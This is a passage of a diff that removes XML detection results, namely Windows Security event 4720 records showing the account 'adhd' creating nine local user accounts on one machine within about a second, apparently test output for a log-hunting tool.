-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.2681686Z'/&gt;&lt;EventRecordID&gt;4501&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;John&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1076&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;John&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>John</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4495</recordid>
-            <time>2020-06-11 22:04:58.192888400Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.1928884Z'/&gt;&lt;EventRecordID&gt;4495&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jesse&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1075&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jesse&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jesse</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4489</recordid>
-            <time>2020-06-11 22:04:58.75387800Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:58.0753878Z'/&gt;&lt;EventRecordID&gt;4489&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Alan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1074&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Alan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Alan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4483</recordid>
-            <time>2020-06-11 22:04:57.991047100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.9910471Z'/&gt;&lt;EventRecordID&gt;4483&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Walter&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1073&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Walter&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Walter</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4477</recordid>
-            <time>2020-06-11 22:04:57.907601000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.9076010Z'/&gt;&lt;EventRecordID&gt;4477&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Marilyn&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1072&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Marilyn&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Marilyn</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4471</recordid>
-            <time>2020-06-11 22:04:57.823307300Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.8233073Z'/&gt;&lt;EventRecordID&gt;4471&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Beau&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1071&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Beau&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Beau</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4465</recordid>
-            <time>2020-06-11 22:04:57.735394000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.7353940Z'/&gt;&lt;EventRecordID&gt;4465&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Jessica&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1070&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Jessica&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Jessica</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4459</recordid>
-            <time>2020-06-11 22:04:57.643075600Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.6430756Z'/&gt;&lt;EventRecordID&gt;4459&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8284'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gerald&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1069&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gerald&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gerald</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4453</recordid>
-            <time>2020-06-11 22:04:57.557840900Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:04:57.5578409Z'/&gt;&lt;EventRecordID&gt;4453&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Stephen&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1068&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Stephen&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Stephen</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4447</recordid>
-            <time>2020-06-11 22:04:57.467546000Z</time>
-            <channel>Security</channel>
